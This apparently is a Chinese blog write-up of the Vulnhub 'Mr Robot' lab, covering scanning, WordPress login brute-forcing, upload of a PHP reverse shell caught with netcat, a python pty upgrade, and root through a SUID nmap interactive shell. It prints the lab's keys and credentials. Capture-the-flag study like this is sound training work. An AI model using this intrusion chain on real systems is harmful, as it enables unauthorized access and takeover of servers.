Vulnhub之mrRobot

Vulnhub是一个很好的靶机平台,想看官网点这里

今天学习mrRobot,点击这里下载哦~

这个比较简单,入门学习,大佬可以绕过哦…

VMware和VirtualBox都可以导入

成功后如图:
在这里插入图片描述
这里启用NAT模式

攻击机 kali 192.168.81.140
靶机:192.168.81.146
在这里插入图片描述
这个时候继续拿出祖传的nmap神器扫描:

nmap -A 192.168.81.146

在这里插入图片描述
有80、443,直接浏览器访问:
在这里插入图片描述
继续看看有啥有价值的
先用dirsearch扫一下目录:
在这里插入图片描述
通过扫描发现是一个wp博客
有robots文件:
在这里插入图片描述

进去看看:
在这里插入图片描述
得到第一个key:073403c8a58a1f80d943455fb30724b9

看命名,应该是有3个key

还有个字典文件,下载下来

还扫到了wp登录界面:
在这里插入图片描述
利用之前的字典bp爆破一下:

配好代理,拦截包:
在这里插入图片描述

发送到Intruder:
在这里插入图片描述

设置好爆破点
(这里先爆破用户名,两个一起爆破,好家伙,太多了)
导入下载的字典:

在这里插入图片描述
开始(kali自带的bp限制了线程,慢如蜗牛):
在这里插入图片描述
不过用户名靠前,出来了Elliot

接下来爆破密码得到密码

ER28-0652

之后登陆后台:

在这里插入图片描述找到一个上传点:
在这里插入图片描述
直接上传shell:
这里我用的是kali自带的shell,
/usr/share/webshells/php/php-reverse-shell.php
修改监听ip
在这里插入图片描述

然后在media里找到了上传的shell

在这里插入图片描述
打开找到了地址;
在这里插入图片描述

再打开一个窗口监听:

nc -lvp 1234

然后访问:

curl http://192.168.81.146/wp-content/uploads/2021/04/php-reverse-shell1.php

在这里插入图片描述
获得shell:
在这里插入图片描述
是一个普通用户

查看linux内核

在这里插入图片描述
这里没得到提权信息,emmmmm

这里通过python打开bash

python -c 'import pty;pty.spawn("/bin/bash");'

在这里插入图片描述

/home/目录下发现了两个文件,key没有权限,发现一串MD5

c3fcd3d76192e4007dfb496cca67e13b

解密:

robot/abcdefghijklmnopqrstuvwxyz
su robot
密码 abcdefghijklmnopqrstuvwxyz

在这里插入图片描述
(这里我也不知道为啥显示双,密码直接复制进去即可)

在这里插入图片描述
这里得到第二个key

822c73956184f694993bede3eb39f959

完成第二步

继续查看用户信息,是否可以提权

find / -perm -4000 2>/dev/null

在这里插入图片描述
这里看到有nmap,查看版本

nmap -v

在这里插入图片描述

nmap2.02-5.21的版本可以执行命令

nmap --interactive

然后输入!sh

在这里插入图片描述

这里可以看到获得root权限。。
在这里插入图片描述

在root目录下,获得第三个key,至此完成测试。








~~《小白测试》

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值